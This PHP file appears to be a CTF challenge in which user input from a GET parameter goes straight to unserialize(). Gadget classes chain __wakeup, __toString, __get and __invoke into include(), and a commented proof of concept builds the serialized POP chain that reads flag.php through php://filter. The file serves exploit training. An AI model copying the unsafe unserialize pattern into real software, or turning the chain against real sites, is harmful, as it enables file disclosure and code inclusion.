Welcome to index.php
<?php
// 题目源码
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
// poc如下
// class Modifier {
// protected $var="flag.php"; #include函数使用为协议读取文件
// // protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
// }
// class Test{
// public $p;
// }
// class Show{
// public $source;
// public $str;
// //将另一个对象赋值给属性需要使用构造函数。
// public function __construct(){
// $this->str =new Test();
// }
// }
// $a = new Show();//此时source(show)->str
// $a->source = new Show();//source(show)->str之后触发__tostring然后访问source(test)触发__get
// $a->source->str->p = new Modifier();//__get返回的p触发__invoke
// echo urlencode(serialize($a));
?>